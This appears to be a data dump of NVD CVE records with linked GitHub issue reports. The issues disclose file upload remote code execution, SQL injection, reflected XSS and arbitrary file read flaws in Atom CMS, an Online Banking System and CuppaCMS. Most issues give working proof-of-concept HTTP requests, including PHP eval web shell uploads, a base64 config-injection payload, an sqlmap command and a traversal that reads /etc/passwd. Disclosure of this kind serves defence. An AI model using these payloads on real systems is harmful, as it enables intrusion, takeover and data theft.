[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thedigicraft/Atom.CMS/issues/256" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thedigicraft/Atom.CMS/issues/256" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8949C5AC-7D10-43A8-929D-B6FCFE9F2DC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/thedigicraft/Atom.CMS/issues/256
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thedigicraft", "Atom.CMS" ]
An Unauthorized attacker can upload arbitrary file in the /admin/uploads.php and executing it on the server reaching the RCE. ## poc ``` POST /admin/uploads.php?id=1 HTTP/1.1 Host: localhost:8888 Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041 Content-Length: 356 Connection: close -----------------------------30623082103363803402542706041 Content-Disposition: form-data; name="file" -----------------------------30623082103363803402542706041 Content-Disposition: form-data; name="file"; filename="cmd.php" Content-Type: image/jpeg <?php @eval($_POST['cmd']);?> -----------------------------30623082103363803402542706041-- ``` <img width="1272" alt="image" src="https://user-images.githubusercontent.com/38547290/154277459-fb0662c1-0be3-4059-a4e9-1cff7e890c29.png"> you can find the filename in response. `1645019130555.php` then you get a shell in `/uploads/1645019130555.php` <img width="1102" alt="image" src="https://user-images.githubusercontent.com/38547290/154277736-c3ad6507-03cd-46ab-ac1d-f28ae0ef0f1e.png"> ## analysis file /admin/uploads.php line 10 without any protect for upload files extension <img width="655" alt="image" src="https://user-images.githubusercontent.com/38547290/154278132-6bbd7743-9b06-477c-b235-5a981e80ee3f.png"> ## Repair suggestions set some filter about files extension
An Unauthorized Remote Code Execution vulnerability exists in AtomCMS v2.0.
https://api.github.com/repos/thedigicraft/Atom.CMS/issues/256/comments
4
2022-02-16T13:50:57Z
2024-09-14T00:26:40Z
https://github.com/thedigicraft/Atom.CMS/issues/256
1,140,049,738
256
3,347
CVE-2022-25488
2022-03-15T18:15:12.343
Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thedigicraft/Atom.CMS/issues/257" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thedigicraft/Atom.CMS/issues/257" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8949C5AC-7D10-43A8-929D-B6FCFE9F2DC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/thedigicraft/Atom.CMS/issues/257
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thedigicraft", "Atom.CMS" ]
## poc `/admin/ajax/avatar.php?id=-1 union select user()%23` the user() output can be found in html source <img width="1010" alt="image" src="https://user-images.githubusercontent.com/38547290/154280173-dffb698e-db1c-4746-9ef6-37ba8bae533e.png"> ## analysis file /admin/ajax/avatar.php line 7 without any filter to protect <img width="1088" alt="image" src="https://user-images.githubusercontent.com/38547290/154280402-d205f086-9093-4071-87fe-1445137c259a.png"> ## repair suggestion add some filter about id
Unauthorized Sql Injection in admin/ajax/avatar.php
https://api.github.com/repos/thedigicraft/Atom.CMS/issues/257/comments
2
2022-02-16T14:04:25Z
2022-12-22T21:15:09Z
https://github.com/thedigicraft/Atom.CMS/issues/257
1,140,064,983
257
3,348
CVE-2022-25489
2022-03-15T18:15:12.430
Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thedigicraft/Atom.CMS/issues/258" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thedigicraft/Atom.CMS/issues/258" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8949C5AC-7D10-43A8-929D-B6FCFE9F2DC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/thedigicraft/Atom.CMS/issues/258
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thedigicraft", "Atom.CMS" ]
## EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in /widgets/debug.php ## exp `/widgets/debug.php?a=<script>alert(1)</script>` <img width="1267" alt="image" src="https://user-images.githubusercontent.com/38547290/154298484-d1cccad0-074e-4aed-9299-bdc8accc27cc.png"> ## analysis /widgets/debug.php line 20 without any filter. ```php <pre> <?php print_r($_GET); ?> </pre> ```
Reflected XSS attack in /widgets/debug.php with the a parameter in AtomCMS 2.0
https://api.github.com/repos/thedigicraft/Atom.CMS/issues/258/comments
2
2022-02-16T15:32:48Z
2022-12-22T21:14:35Z
https://github.com/thedigicraft/Atom.CMS/issues/258
1,140,196,236
258
3,349
CVE-2022-25494
2022-03-15T18:15:12.777
Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via staff_login.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/g33kyrash/Online-Banking-system/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/g33kyrash/Online-Banking-system/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:online_banking_system_project:online_banking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "69D0D756-F3BA-4E32-9F56-9B8CA0F47FB2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/g33kyrash/Online-Banking-system/issues/16
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "g33kyrash", "Online-Banking-system" ]
## poc First visit http://ip:port/staff_login.php <img width="1089" alt="image" src="https://user-images.githubusercontent.com/38547290/154430289-dcb7f4f6-de98-4b43-a674-971e36e2a5bc.png"> Enter any user and password,Use burp to capture packets ![image](https://user-images.githubusercontent.com/38547290/154430407-632ed819-463e-4a3a-b54f-dd652f584e2c.png) Modify the data package as follows, save as data.txt: ``` POST /staff_login.php HTTP/1.1 Host: localhost:8888 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 48 Origin: http://localhost:8888 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 uname=*&pwd=admin&submitBtn=Log+In ``` execute SQLmap `python sqlmap.py -r data.txt --batch --current-user` <img width="1015" alt="image" src="https://user-images.githubusercontent.com/38547290/154430748-2fed6590-5155-4dc2-a5dc-d41a7f878536.png"> ## analysis file staff_login.php line 43 ``` $username=$_REQUEST['uname']; $password=$_REQUEST['pwd']; $sql="SELECT email,pwd FROM staff WHERE email='$username' AND pwd='$password'"; ``` without any filter for username and password
There is a SQL injection vulnerability in staff_login.php
https://api.github.com/repos/g33kyrash/Online-Banking-system/issues/16/comments
0
2022-02-17T07:58:38Z
2022-02-17T07:58:38Z
https://github.com/g33kyrash/Online-Banking-system/issues/16
1,140,992,138
16
3,350
CVE-2022-25495
2022-03-15T18:15:12.840
The component /jquery_file_upload/server/php/index.php of CuppaCMS v1.0 allows attackers to upload arbitrary files and execute arbitrary code via a crafted PHP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/CuppaCMS/CuppaCMS/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
An Non-authenticated attacker can upload arbitrary file via the /js/jquery_file_upload/server/php/index.php and executing it on the server reaching the RCE. ## poc ``` POST /classes/ajax/Functions.php HTTP/1.1 Host: localhost:8888 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1061 Cookie: country=us; language=en; administrator_document_path=%2F file=eyJhZG1pbmlzdHJhdG9yX3RlbXBsYXRlIjoiZGVmYXVsdCIsImxpc3RfbGltaXQiOiIyNSIsImZvbnRfbGlzdCI6IlJhbGV3YXkiLCJzZWN1cmVfbG9naW4iOiIwIiwic2VjdXJlX2xvZ2luX3ZhbHVlIjoiIiwic2VjdXJlX2xvZ2luX3JlZGlyZWN0IjoiIiwibGFuZ3VhZ2VfZGVmYXVsdCI6ImVuIiwiY291bnRyeV9kZWZhdWx0IjoidXMiLCJnbG9iYWxfZW5jb2RlIjoic2hhMVNhbHQiLCJnbG9iYWxfZW5jb2RlX3NhbHQiOiJBR2R2TWRxOVJSY3dqRnowWFFxdWNwRnByS1hnYldNMiIsInNzbCI6IjAiLCJsYXRlcmFsX21lbnUiOiJleHBhbmRlZCIsImJhc2VfdXJsIjoiIiwiYXV0b19sb2dvdXRfdGltZSI6IjMwIiwicmVkaXJlY3RfdG8iOiJmYWxzZSIsImhvc3QiOiJsb2NhbGhvc3QiLCJkYiI6ImJhaWNtcyIsInVzZXIiOiJyb290IiwicGFzc3dvcmQiOiIxMjNxd2UiLCJ0YWJsZV9wcmVmaXgiOiJjdV8iLCJhbGxvd2VkX2V4dGVuc2lvbnMiOiIqLmdpZjsgKi5qcGc7ICouanBlZzsgKi5wZGY7ICouaWNvOyAqLnBuZzsgKi5zdmc7Ki5waHA7IiwidXBsb2FkX2RlZmF1bHRfcGF0aCI6InVwbG9hZF9maWxlcyIsIm1heGltdW1fZmlsZV9zaXplIjoiNTI0Mjg4MCIsImNzdl9jb2x1bW5fc2VwYXJhdG9yIjoiLCIsInRpbmlmeV9rZXkiOiIiLCJlbWFpbF9vdXRnb2luZyI6IiIsImZvcndhcmQiOiIiLCJzbXRwIjoiMCIsImVtYWlsX2hvc3QiOiIiLCJlbWFpbF9wb3J0IjoiIiwiZW1haWxfcGFzc3dvcmQiOiIiLCJzbXRwX3NlY3VyaXR5IjoiIiwiY29kZSI6IiJ9&function=saveConfigData ``` this request will set $allowed_extensions in Configuration.php will add `.php` <img width="1492" alt="image" src="https://user-images.githubusercontent.com/38547290/154810736-59d5d71b-d84c-4923-bb7b-b071ac14481a.png"> then upload a php file ,set the path as "../" ```php POST /js/jquery_file_upload/server/php/ HTTP/1.1 Host: localhost:8888 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------8021712423960420462477355542 Content-Length: 930 -----------------------------8021712423960420462477355542 Content-Disposition: form-data; name="path" ../ -----------------------------8021712423960420462477355542 Content-Disposition: form-data; name="unique_name" true -----------------------------8021712423960420462477355542 Content-Disposition: form-data; name="resize_width" -----------------------------8021712423960420462477355542 Content-Disposition: form-data; name="resize_height" -----------------------------8021712423960420462477355542 Content-Disposition: form-data; name="crop" -----------------------------8021712423960420462477355542 Content-Disposition: form-data; name="compress" -----------------------------8021712423960420462477355542 Content-Disposition: form-data; name="files[]"; filename="cmd.php" Content-Type: image/jpeg <?php @eval($_POST['cmd']);?> -----------------------------8021712423960420462477355542-- ``` <img width="1265" alt="image" src="https://user-images.githubusercontent.com/38547290/154805877-271121ca-3aa1-42eb-96c8-eff2eb3a7993.png"> uploadfile name can be seen in response `"url":"..\/..\/..\/..\/media\/..\/\/cmd_1645281565.php"` as we can know,`/media/../cmd_1645281565.php` is as same as `/cmd_1645281565.php` so visit `/cmd_1645281565.php ` you can getshell <img width="1220" alt="image" src="https://user-images.githubusercontent.com/38547290/154805952-fab91dd0-12ff-4277-92a1-ba602eeaca36.png">
Unauthorized Remote Code Execution vulnerability exists in Cuppa cms via file upload function
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/26/comments
0
2022-02-19T14:51:30Z
2022-02-19T17:04:10Z
https://github.com/CuppaCMS/CuppaCMS/issues/26
1,144,737,764
26
3,351
CVE-2022-25497
2022-03-15T18:15:12.920
CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "552" ]
552
https://github.com/CuppaCMS/CuppaCMS/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
An Unauthorized attacker can read arbitrary file via copy function ## poc ``` POST /js/filemanager/api/index.php HTTP/1.1 Host: localhost:8888 Content-Type: application/json Origin: http://localhost:8888 Content-Length: 98 {"from":"//../../../../../../../../../../../../../etc/passwd","to":"/../out.txt","action":"copyFile"} ``` then visit '/out.txt' <img width="941" alt="image" src="https://user-images.githubusercontent.com/38547290/154809335-a05d9379-a56b-42ea-9b14-d9b47d7f55f9.png">
Unauthorized Arbitrary File Read vulnerability exists in CuppaCMS
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/28/comments
0
2022-02-19T16:22:14Z
2022-02-19T16:22:14Z
https://github.com/CuppaCMS/CuppaCMS/issues/28
1,144,774,030
28
3,352
CVE-2022-25498
2022-03-15T18:15:12.990
CuppaCMS v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the saveConfigData function in /classes/ajax/Functions.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/CuppaCMS/CuppaCMS/issues/29
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
An Unauthorized attacker can execute arbitrary php code via `/classes/ajax/Functions.php`, `saveConfigData` function ## poc ``` POST /classes/ajax/Functions.php HTTP/1.1 Host: localhost:8888 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1097 Cookie: country=us; language=en; administrator_document_path=%2F file=eyJhZG1pbmlzdHJhdG9yX3RlbXBsYXRlIjoiZGVmYXVsdCIsImxpc3RfbGltaXQiOiIyNSIsImZvbnRfbGlzdCI6IlJhbGV3YXkiLCJzZWN1cmVfbG9naW4iOiIwIiwic2VjdXJlX2xvZ2luX3ZhbHVlIjoiIiwic2VjdXJlX2xvZ2luX3JlZGlyZWN0IjoiIiwibGFuZ3VhZ2VfZGVmYXVsdCI6ImVuIiwiY291bnRyeV9kZWZhdWx0IjoidXMiLCJnbG9iYWxfZW5jb2RlIjoic2hhMVNhbHQiLCJnbG9iYWxfZW5jb2RlX3NhbHQiOiJBR2R2TWRxOVJSY3dqRnowWFFxdWNwRnByS1hnYldNMiIsInNzbCI6IjAiLCJsYXRlcmFsX21lbnUiOiJleHBhbmRlZCIsImJhc2VfdXJsIjoiIiwiYXV0b19sb2dvdXRfdGltZSI6IjMwIiwicmVkaXJlY3RfdG8iOiJmYWxzZSIsImhvc3QiOiJsb2NhbGhvc3QiLCJkYiI6ImJhaWNtcyIsInVzZXIiOiJyb290IiwicGFzc3dvcmQiOiIxMjNxd2UiLCJ0YWJsZV9wcmVmaXgiOiJjdV8iLCJhbGxvd2VkX2V4dGVuc2lvbnMiOiIqLmdpZjsgKi5qcGc7ICouanBlZzsgKi5wZGY7ICouaWNvOyAqLnBuZzsgKi5zdmc7Ki5waHA7IiwidXBsb2FkX2RlZmF1bHRfcGF0aCI6InVwbG9hZF9maWxlcyIsIm1heGltdW1fZmlsZV9zaXplIjoiNTI0Mjg4MCIsImNzdl9jb2x1bW5fc2VwYXJhdG9yIjoiLCIsInRpbmlmeV9rZXkiOiIiLCJlbWFpbF9vdXRnb2luZyI6IiIsImZvcndhcmQiOiIiLCJzbXRwIjoiMCIsImVtYWlsX2hvc3QiOiIiLCJlbWFpbF9wb3J0IjoiIiwiZW1haWxfcGFzc3dvcmQiOiIiLCJzbXRwX3NlY3VyaXR5IjoiIiwiY29kZSI6IlwiO31ldmFsKCRfUE9TVFsnY21kJ10pOy8qIn0=&function=saveConfigData ``` then `/Configuration.php` is your webshell password is `cmd` <img width="1292" alt="image" src="https://user-images.githubusercontent.com/38547290/154812136-8c78218f-51a0-4a53-957e-84606a2ba0c0.png"> ## analysis when parameter file is ``` eyJhZG1pbmlzdHJhdG9yX3RlbXBsYXRlIjoiZGVmYXVsdCIsImxpc3RfbGltaXQiOiIyNSIsImZvbnRfbGlzdCI6IlJhbGV3YXkiLCJzZWN1cmVfbG9naW4iOiIwIiwic2VjdXJlX2xvZ2luX3ZhbHVlIjoiIiwic2VjdXJlX2xvZ2luX3JlZGlyZWN0IjoiIiwibGFuZ3VhZ2VfZGVmYXVsdCI6ImVuIiwiY291bnRyeV9kZWZhdWx0IjoidXMiLCJnbG9iYWxfZW5jb2RlIjoic2hhMVNhbHQiLCJnbG9iYWxfZW5jb2RlX3NhbHQiOiJBR2R2TWRxOVJSY3dqRnowWFFxdWNwRnByS1hnYldNMiIsInNzbCI6IjAiLCJsYXRlcmFsX21lbnUiOiJleHBhbmRlZCIsImJhc2VfdXJsIjoiIiwiYXV0b19sb2dvdXRfdGltZSI6IjMwIiwicmVkaXJlY3RfdG8iOiJmYWxzZSIsImhvc3QiOiJsb2NhbGhvc3QiLCJkYiI6ImJhaWNtcyIsInVzZXIiOiJyb290IiwicGFzc3dvcmQiOiIxMjNxd2UiLCJ0YWJsZV9wcmVmaXgiOiJjdV8iLCJhbGxvd2VkX2V4dGVuc2lvbnMiOiIqLmdpZjsgKi5qcGc7ICouanBlZzsgKi5wZGY7ICouaWNvOyAqLnBuZzsgKi5zdmc7Ki5waHA7IiwidXBsb2FkX2RlZmF1bHRfcGF0aCI6InVwbG9hZF9maWxlcyIsIm1heGltdW1fZmlsZV9zaXplIjoiNTI0Mjg4MCIsImNzdl9jb2x1bW5fc2VwYXJhdG9yIjoiLCIsInRpbmlmeV9rZXkiOiIiLCJlbWFpbF9vdXRnb2luZyI6IiIsImZvcndhcmQiOiIiLCJzbXRwIjoiMCIsImVtYWlsX2hvc3QiOiIiLCJlbWFpbF9wb3J0IjoiIiwiZW1haWxfcGFzc3dvcmQiOiIiLCJzbXRwX3NlY3VyaXR5IjoiIiwiY29kZSI6IlwiO31ldmFsKCRfUE9TVFsnY21kJ10pOy8qIn0= ``` after base64decode is ` {"administrator_template":"default","list_limit":"25","font_list":"Raleway","secure_login":"0","secure_login_value":"","secure_login_redirect":"","language_default":"en","country_default":"us","global_encode":"sha1Salt","global_encode_salt":"AGdvMdq9RRcwjFz0XQqucpFprKXgbWM2","ssl":"0","lateral_menu":"expanded","base_url":"","auto_logout_time":"30","redirect_to":"false","host":"localhost","db":"baicms","user":"root","password":"123qwe","table_prefix":"cu_","allowed_extensions":"*.gif; *.jpg; *.jpeg; *.pdf; *.ico; *.png; *.svg;*.php;","upload_default_path":"upload_files","maximum_file_size":"5242880","csv_column_separator":",","tinify_key":"","email_outgoing":"","forward":"","smtp":"0","email_host":"","email_port":"","email_password":"","smtp_security":"","code":"\";}eval($_POST['cmd']);/*"}` we can code inject into the last line, and the final result is our shellcode injected to the `/Configuration.php` <img width="1423" alt="image" src="https://user-images.githubusercontent.com/38547290/154812329-c3a50393-41d5-4c43-996a-85d655ffd43f.png">
Unauthorized Remote Code Execution vulnerability exists in CuppaCMS via saveConfigData function
